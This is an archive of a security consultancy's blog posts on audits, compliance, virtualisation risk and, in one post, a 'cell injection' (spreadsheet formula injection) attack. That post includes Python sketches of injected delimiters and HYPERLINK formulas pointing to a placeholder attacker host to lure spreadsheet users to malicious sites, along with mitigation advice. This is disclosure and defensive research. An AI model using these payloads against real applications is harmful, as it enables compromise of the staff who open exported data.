
Thursday, 2 May 2013

Innovation Vouchers for Cyber Security

The Technology Strategy Board within the UK has recently provided access to funding (up to £5,000) for SMEs, entrepreneurs and early stage start-ups looking to gain assurance around their ‘Cyber Security’.

Funding IT Security and assurance activity can be a real barrier to SMEs. When it is placed against other competing priorities, it often does not win the battle for internal funding. Nevertheless it remains a key enabler to business success. The UK Government stepping in to provide help with funding is a really positive step and a great opportunity for SMEs to overcome the funding barrier.

This blog post takes a look at the funding on offer and more importantly provides clarity around the terms used. This will enable organisations to clearly identify those areas they want to engage with and make best use of this external funding.

First important note:
The closing date for applications is the 24th July 2013, and the scheme is open to UK-based companies.

Second important note:
Don't be put off or confused by the term 'Cyber'. 
We are actually talking about information technology and computers. 
For more background on what 'Cyber' and 'Cyber Security' actually mean, take a look at my last blog post.

Innovation Vouchers for Cyber Security
The Innovation Vouchers can be used to secure specialist services and consulting to help with the following:

  • Businesses looking to protect new inventions and business processes.
  • Businesses looking to ‘cyber audit' their existing processes.
  • Businesses looking to move online and develop a technology strategy.
  • Business start-ups looking to develop an idea into a working prototype and needing to build cyber security into the business from the very beginning.

This offers quite a range of options, and many business projects could be aligned to fit and therefore be eligible for funding. But let's take a look at one specific area and see what could be done.

Businesses looking to ‘cyber audit' their existing processes

Let's take 'Cyber' as meaning information technology and an 'Audit' as meaning a systematic review or assessment. A 'Cyber Audit' in this context is then, more simply put, an audit of the organisation's information security controls.

Audits can be paper based, with an auditor conducting a review of an existing control, or be delivered as a technical assessment, such as a vulnerability assessment / penetration test.

Audits are great for looking at the policy and processes within an organisation, whereas a technical assessment will test that those controls actually deliver the required or expected level of security. The key here is to choose the most appropriate engagement for your own requirements.

Why would conducting an audit be a good step to take?

Today our business environment is more complex and interconnected than ever before. Business environments rely on electronic data as their lifeblood and the systems that enable the storage, transport, access and manipulation of this data have become critical. This has resulted in an era where networks and the applications sitting within them have become the very backbone of every organisation, regardless of their size and market sector. 

An audit or assessment of an organisation’s current approach to security can be used to identify if adequate information security management is in place to protect the level of information asset being hosted, stored, transmitted or processed. 

Just remember to choose a security consultancy that will work in close partnership with you to tailor the solution required and not just sell you a 'Cyber Product'.

A good engagement will leave you with a clear understanding of areas for improvement, the potential impact to you and more importantly what can be done to address these. 

A bad engagement will most likely leave you swimming in a sea of FUD (Fear, Uncertainty and Doubt)  and the frequency of the word 'Cyber' is likely to be proportional to the amount of proprietary solutions that the vendor sells to fix the issues they find. 

Conclusion

Costs can be a significant barrier for SMEs when it comes to security and the use of jargon can get in the way of our understanding of what can be done and why it is important. 

However, even small organisations need to be aware of their security exposure. So, by making use of this funding and approaching it from a knowledgeable position, you can drive an engagement that will enable your organisation to gain an understanding of the security risks it carries and how to start addressing them in a risk-based manner.

If you are looking to make use of this voucher then more information can be found here.

Tuesday, 29 January 2013

Cell Injection

[Cell Injection] Attacking the end user through the application.

[Introduction]
At 7 Elements our approach to application security testing blends the identification of technical exposure with business logic flaws, which could lead to a breach in security. By taking this approach, and by understanding the business context and envisaged use, it is possible to provide a deeper level of assurance. We have used this approach to identify a novel attack that we have called cell injection.


[What is Cell Injection?]
Cell injection occurs where a user is able to inject valid spreadsheet function calls or valid delimited values into a spreadsheet via a web front end, resulting in unintended consequences. A number of attacks exist, from simple data pollution to more harmful calls to external sources.


[Basic injection technique]
At a simple level we can look to inject values that we can expect to be interpreted as valid Comma-Separated Values (CSV). For such a widely used format, there is still no formal specification, which according to RFC 4180 "allows for a wide variety of interpretations of CSV files". As such we should look to inject common delimiters such as the semicolon, comma or tab, but also other values such as the ASCII characters "|", "+" and "^".


If these values are interpreted by the spreadsheet, then you can expect data pollution to occur, with cells shifted from their expected locations. The following example shows the "|" character being used to insert additional cells within a spreadsheet. This was done by inserting four "|" values within the 'Amount' field, which results in the values expected within D4 and E4 appearing instead in H4 and I4:
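To make that shifting behaviour concrete, here is a minimal Python sketch. It is not the application from our engagement; the field layout and values are invented, and the pipe-delimited export stands in for any naive export routine that writes user input straight into a delimited file.

```python
# Hypothetical reproduction of delimiter-based cell shifting.
rows = [
    # id, name, amount, currency, reference
    ["1", "Alice",   "100.00",   "GBP", "INV-001"],  # benign row
    ["2", "Mallory", "0.01||||", "GBP", "INV-002"],  # four '|' characters injected via the 'Amount' field
]

# A naive export writes the values straight into a pipe-delimited file.
export = "\n".join("|".join(row) for row in rows)

# When the file is parsed on the delimiter, the injected row gains four
# extra (empty) cells, pushing the later columns out of position.
for line in export.splitlines():
    print(line.split("|"))
```

The benign row parses into five cells, while the injected row parses into nine, so the currency and reference values no longer sit in their expected columns.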



Where it is possible to insert the "=" sign, we can then attempt to use function calls within the spreadsheet. 

Microsoft lists all possible functions; however, the one we are interested in for the purpose of attack is the HYPERLINK function, which has the following syntax:

HYPERLINK(link_location,friendly_name)

What can you do with it? Firstly, we need to change the injected string to point to an external site under our control. For this example we will use our web site by submitting the following string:


If the friendly_name specified is created within the spreadsheet, then we have successfully injected our data:




Within Microsoft Excel, a user clicking on this link will not be prompted for any confirmation that they are about to visit an external link. A single click will be enough to launch a browser and load the destination address. Using this approach, an attacker could configure the URL to point to a malicious site containing browser-based malware and attempt to compromise the client browser and gain access to the underlying operating system.
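To make the shape of such a payload clearer, here is a hypothetical sketch of how a HYPERLINK value could end up in an exported file. The URL is a placeholder for an attacker-controlled site, and the CSV writing below is a stand-in for the application's own export routine rather than the code we tested.

```python
import csv

# Hypothetical payload: HYPERLINK pointing at a placeholder attacker-controlled URL.
payload = '=HYPERLINK("http://attacker.example.com","Click Here")'

rows = [
    ["TXN-1001", "Alice",   "100.00", "Invoice payment"],
    ["TXN-1002", "Mallory", "0.01",   payload],  # value submitted via the web form
]

# Stand-in for the application's export: user-supplied data written
# straight into a CSV with no filtering or encoding.
with open("transactions.csv", "w", newline="") as f:
    csv.writer(f).writerows(rows)

# Opening transactions.csv in Excel typically renders the final cell of
# the second row as a clickable 'Click Here' link pointing at the URL above.
```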



[Advanced Injection]
The basic HYPERLINK attack requires that you can inject double quotation marks around the link and friendly_name values. As this is commonly filtered input, the basic attack may fail. To bypass this restriction, it is possible to use a more advanced technique to generate a valid HYPERLINK function. This approach uses calls to other cells within the spreadsheet and therefore negates the requirement to supply double quotes. To use this approach you will need to set one cell as the "friendly_name" and a second cell as the "link_location". Lastly, you will then need to inject the HYPERLINK function, referencing the locations of these fields. The following string shows such an attack:



As part of this Proof of Concept, we have hard-coded the cell values E4 and F4, but we believe it should be possible to dynamically create these using the ROW() and COLUMN() functions. Using this approach we can then create the 'Click Here' cell without the need for double quotes:
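The sketch below illustrates the quote-free variant. The field layout is invented so that the injected values line up with the hard-coded E4 and F4 references from the proof of concept above; it is an assumption-laden illustration, not the exact input used in our testing.

```python
# Hypothetical sketch of the quote-free variant: three separate input
# fields are abused, so no double quotes need to survive input filtering.
injected_friendly_name = "Click Here"                   # assumed to land in cell E4
injected_link_location = "http://attacker.example.com"  # assumed to land in cell F4 (placeholder URL)
injected_formula       = "=HYPERLINK(F4,E4)"            # link_location from F4, friendly_name from E4

# Invented record layout chosen so the three values fall into E, F and G
# of row 4 of the exported sheet; a real attack would need to know (or
# derive, e.g. via ROW() and COLUMN()) where the values actually land.
row = ["4", "TXN-1003", "Mallory", "0.01",
       injected_friendly_name, injected_link_location, injected_formula]
print(",".join(row))
# Once the export is opened, the formula cell evaluates HYPERLINK() using
# the contents of the other two cells, recreating the 'Click Here' link
# without a single double quote appearing in the injected input.
```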



During our tests we have also identified other attack vectors, such as updating fields or cell value lookup functions, where we do not have direct access to the content from the web application. This could be used to overwrite data for our own gain or populate a cell that is then later used to echo out data to a client with a value from a normally hidden cell.



[Mitigation]
As this attack is focused on the end user of the spreadsheet, mitigation is best placed at the point the data is first input. As such, we would recommend that user input is validated based upon what is required. The best method of doing this is via 'white-listing': where possible, all characters that have a valid meaning within the destination spreadsheet should be removed from your white-list of valid characters. We would also recommend that, where possible, you do not permit the equals sign as the first character in a field.
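As a rough, hypothetical sketch of that advice, the following shows one way a whitelist plus a leading-equals check could be applied at the point of input. The allowed character set is an example only and would need to be tuned to what each field genuinely needs to contain.

```python
import re

# Hypothetical whitelist-based sanitiser applied at the point of input.
ALLOWED = re.compile(r"[^A-Za-z0-9 .\-]")  # drops |, +, ^, =, ", ; and other delimiters/operators

def sanitise(value: str) -> str:
    cleaned = ALLOWED.sub("", value)
    # Per the advice above, never allow an equals sign as the first
    # character (belt and braces in case '=' is ever whitelisted for a field).
    return cleaned.lstrip("=")

print(sanitise('=HYPERLINK("http://attacker.example.com","Click Here")'))
# The '=' and the surrounding formula punctuation are stripped, so the
# stored value can no longer be interpreted as a function call or as an
# extra delimiter when it reaches the spreadsheet.
```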


Time for a working example and exploit:


[Setting the scene]

To illustrate this attack and to provide context, we will use a scenario that we often come across during our engagements, based on the use of third-party provisioned services to deliver transactional functionality. With this type of service we often find that back-end data management and record retention is achieved through the use of spreadsheets. To help provide a working example, we have developed a dummy transactional website. This site has two main functions: the end-user facing application and an admin section. Users access the application over the internet to transfer funds electronically. The end organisation utilises the admin functionality to manage the site, and via the application they can view transactions. They are also provided with the ability to download transactional data for internal processing and data retention. At a high level it would look like this:



[Attack Surface]
The main input fields that an attacker can interact with are as follows:



The application has been designed to provide defence against the OWASP Top 10. Specifically, the application has been coded to defend against common input validation attacks such as SQL Injection and Cross Site Scripting, as well as correctly encoding all output that is displayed within the application.

Given this scenario, the attack options will be limited to the 'Back Office' component of this application. The robust security measures already discussed have mitigated attacks against end users of the application, as well as direct attacks against the application and database. On further inspection, and through a manual testing approach that looks at the end-to-end business process involved, it would be noted that the 'Back Office' function of this application relies on the download and use of spreadsheet data:



The data is lifted directly from the database and, on download, results in the spreadsheet opening on the 'Back Office' computer screen:



Let's now use our cell injection to compromise the integrity of the data stored within the spreadsheet and gain remote access to the 'Back Office' computer.  


[Exploit]
The following video shows how an attacker can use cell injection via the front client facing application to compromise an internal host. The attack requires the end user to place trust in the data, but then who doesn't trust content that they have decided to download?


Blogger video is a little limited, so for those who want to see all the detail, we have hosted the video here.

[Conclusion]
By taking the time to understand how data would be input into the system, and more importantly where the data is then output to an end user, we were able to develop a specific attack approach to directly target end users of the data and gain unauthorised access to systems and data. 

In this example, correct encoding of user-supplied data in the context of its use had not been fully implemented, yet without this level of testing the application would have appeared to be protected against input/output validation based attacks. This could lead to a false sense of security. Further to this, being able to attack internal hosts directly changes the assumed threat surface and therefore raises issues around browser patch management and the lack of egress filtering in place.

As we have seen from this blog, testing should be more than just the OWASP Top 10. We need to think about the overall context of the application, the business logic in use and, ultimately, where and how our input is used and how it manifests as output. This provides a further example of the need to take a layered approach to security and accept that you cannot achieve 100% protection. It highlights the need to implement a resilient approach, building upon a robust defensive posture, that takes into account the need to be able to detect, react to and recover from a breach.

Monday, 21 January 2013

Vacancy: Security Tester






Just a quick reminder that our current vacancy for an experienced security tester closes on the 1st February 2013.

More information can be found here and here.


Wednesday, 28 March 2012

The 7 Elements

A question I am often asked is what is behind the name '7 Elements'. So for this blog post, I am going to explore this in more detail and go through each of the 7 Elements in turn.

The name 7 Elements reflects the belief that there are seven core activities required within an organisation's approach to information security. Only by embedding all seven can an organisation truly deliver a holistic and resilient approach to information security, one that will enable it to meet its business objectives and, in the end, to survive.

The Elements


Design | Build | Manage | Embed | Adapt | Sustain | Assure



Out of the seven, the following six elements provide the foundations required for a resilient approach to security:

Design:

Within this element an organisation needs to define architecture, policies and standards to deliver a resilient approach to information security.

Build:

Next, you need to deploy systems and infrastructure that meet your design and protect your organisation's information.

Manage:

Ongoing management is then required to ensure that your systems are operated securely and new projects align with your security design. This element can also include the management of complex security testing engagements.

Embed:

Embedding security strategy, culture and awareness into your business processes is vital to the overall organisational approach to security.

Adapt:

We do not live in a static environment, so it is vital that we can respond to changes within the threat landscape with regular reviews and updates that inform all of the elements.

Sustain:

Incidents will happen, both malicious and unintentional, so there is a need to deliver business resiliency through Incident Management and Resiliency testing.


This then brings me to what I feel is the most important and often neglected element required:

Assure:

The 7th Element is all about gaining assurance over any aspect of your approach to security, through practical and pragmatic security testing. Many organisations will focus on aspects of the other elements and fail to gain assurance that their approach actually provides the level of protection required and as such could expose the organisation to hidden risks.

Security testing allows you to test the assumptions and controls that are designed to provide a level of security, and to gain assurance that each assumption or control actually does what was expected or, more importantly, doesn't do something unexpected that results in a compromise of data.


This approach would then lead to the following model:




Wednesday, 21 March 2012

Careers at 7 Elements

7 Elements is always looking for talented professionals to join our growing company. If you have a strong technical background delivering innovative testing and have the ability to translate technical issues into clear business related impact then we want to hear from you.

For more information, visit our careers page.

7 Elements does not accept agency CVs and will not be held responsible for any fees related to unsolicited CVs.

Friday, 12 August 2011

Compliance vs Assurance

Compliance is often the sole assurance activity undertaken. But is this really enough?


Introduction

Many companies take steps to ensure that they comply with industry standards and regulations, as well as requiring individual business areas to meet the organisation’s own internal policies and standards/procedures. Compliance activity is then undertaken to check that these policies and standards are met.


What Is Compliance?

Compliance activity is generally carried out to confirm that a defined baseline standard of security is reached across the broad scope of an organisation. These baseline standards though do not necessarily ensure that systems, networks and assets meet the level of security required by the organisation or the individual business area, or that the security risk sits within the organisation’s risk appetite. Compliance alone will therefore not provide assurance that the organisation is secure, but rather that the policies and standards have been met.

As such, compliance can become a ceiling rather than the baseline.


Why Do More?

In addition to compliance, assurance should also be sought. The information security threat space is a rapidly evolving environment and as such security controls need to be responsive to prevent or combat the threat. Standards can easily and quickly become out of date. Compliance alone is therefore not enough. Assurance activity will take into account the broader threat environment, and look at the risks to an asset within the context of the external environment and the criticality of the data or function that the asset represents.


What is required?

A blended approach, taking into account both the need to be compliant with policy and the ability to gain assurance, is required to manage IT security risk effectively. Assurance testing would look to test the control to confirm that it is not only the right control but that it also provides the level of protection required. This therefore provides a true assessment of the security risks faced by that asset and would expose any false sense of security that misplaced trust in a control had provided.

This approach would enable organisations to satisfy themselves that they are within risk appetite by ensuring that systems and assets not only meet the standards laid out in a policy but that the level of security risk is fully understood.

Tuesday, 4 January 2011

Threat Mapping and Security Testing within Virtualised Environments


Background

The deployment of Virtualisation within existing network architectures and the resulting collapse of network zones on to single physical servers are likely to introduce radical changes to current architectural and security models, resulting in an increased threat to the confidentiality, integrity or availability of the data held by such systems. Recent experience has already shown that the use of Virtualisation can introduce single points of failure within networks and successful attacks can result in the ability to access data from across multiple zones that would have historically been physically segregated.

To deal with this change will require a corresponding change to the architectural and security models used and a full understanding of the associated risks/threats that Virtualisation brings.

The purpose of this post is to set out areas that will need to be explored in order to gain assurance that Virtual Environments do not introduce or aggravate potential security vulnerabilities and flaws that can be exploited by an attacker to gain access to confidential information, affect data integrity or reduce the availability of a service.

Virtualisation raises lots of questions, including:

  • Will the Virtual Environment breach existing security controls that protect the existing physical estate? If so, how?

  • What additional controls will be required?
  • Does the proposed change exceed risk appetite?


Threat Mapping

To explore these questions, a comprehensive threat mapping exercise should be undertaken to look at the level of risk and threats associated with Virtualisation. This exercise should be tailored to the specific environment and business market that you are in (for example, financial organisations will need to be aware of regulatory requirements such as PCI-DSS, which could impact on the use of Virtualisation).

A detailed threat map will aid in the development of a robust architectural model as well as feed in to any assurance work conducted. Such activity should be completed at the design stage and, failing that, at the latest prior to any deployment, as reviewing potential threats after deployment can result in costly redesign and implementation work.

Any risks and potential vulnerabilities that are identified during the threat analysis phase should be mitigated with appropriate security controls and built in to the design prior to implementation. Security testing should then be arranged to verify that the risks have been effectively mitigated.


Of course, in some instances there will be environments where threat mapping is not part of usual business security practice. Where this is the case, any team conducting assurance activity should complete a tactical threat mapping exercise as part of their engagement, to inform the direction and context of any testing and recommendations. A tactical threat mapping exercise is one where less time and effort is applied and the focus is more on a 'how would we attack this system' basis. Such an approach will take into account possible attack scenarios and is likely to form the basis of a penetration testing scoping exercise.

Technology and functionality change fast, and this can lead to a change in the attack surface of an organisation. Threat assessments should therefore be an ongoing activity; even a regular tactical threat assessment that takes into account how changes in the technology deployed affect the effectiveness of existing controls will aid the organisation's understanding of the threats posed and may help to avoid a costly breach or loss of data.



Example Questions

Questions that should be asked as part of a threat mapping exercise:

How will Virtualisation impact the patch management process?

  • Consideration will be needed in terms of patching and virus control within a centralised environment. Virtualisation introduces the risk of out-of-sync Virtual Machines existing within the network. As an example, the introduction of VM snapshot/rollback functionality adds a new capability to undo changes back to a "known good" state, but within a server environment, when someone rolls back changes they may also roll back security patches or configuration changes that have been made.

Is there sufficient segregation of administrative duties?

  • Layer 2 devices are becoming virtualised commodities; this could lead to a new breed of ‘virtualisation administrators’ who straddle the role of traditional network and security engineers, and thus hold the keys to the virtual kingdom. With virtualised SANs, these admins will also be responsible for assigning storage groups to specific VMs, so again they may have rights across that network divide as well, essentially making them network, server and storage admins from a rights perspective.


Is there a suitable security model in place?

  • Where multiple user groups or zones, or different risk appetites, exist within an environment, separate security models should be created to contain breaches within one zone and help protect against known attack types.
  • No single security model should be applied across all groups or zones.


Is there suitable resiliency built in to the environment?

  • What level of resiliency is required in terms of disaster recovery and denial-of-service mitigation, are those measures in place and, more importantly, are they effective?
  • Is there sufficient Disaster Recovery built in to the environment?

How does the virtual environment interact with existing network architectures and authentication mechanisms?

  • Does this introduce a weakness to the environment that could be utilised by a malicious party?


Has a design review been completed?

  • Virtualised environments are complex; as such, an effective and detailed review of the proposed design should be conducted during the design stage to aid the development of a more robust and secure system. The output from threat modelling should be incorporated into this review to ensure that a suitable design is implemented.


Are you outsourcing any component of the virtualised environment?

  • Third party relationships have become a major focus over the last few years with several high profile data loss incidents in the media. The contract with the vendor should include appropriate clauses to ensure data security, while formally enabling testing and remediation activities. More specifically the contract should facilitate regular security testing.
  • Does the outsource contract allow you to define the physical location of your data? The jurisdiction can affect not only the threat model, but also your handling of risks.


To Close

Any security testing conducted against the virtual environment should follow detailed and industry-standard methodologies (OWASP, CREST, OSSTMM) and comprise both infrastructure testing / build reviews and security device configuration reviews (i.e. firewall rule sets). However, specific testing to break out of the virtual environment will need to be included, as the ability to access the restricted hardware layer will result in data leakage and potentially the ability to compromise any other attached Virtual Machines (gaining unauthorised access to user data and systems).

Essentially, many of the areas of risk which are specific to virtualisation arise from the capabilities it provides. For example, virtualisation allows for the hosting of systems from different networks on a single physical server. This can have benefits in terms of reduced costs and datacentre space requirements, but it also introduces a new perimeter between networks: the virtualisation hypervisor. So if there is a security issue which affects the hypervisor, it can allow attackers to jump from one network zone to another, effectively bypassing existing security controls such as firewalls.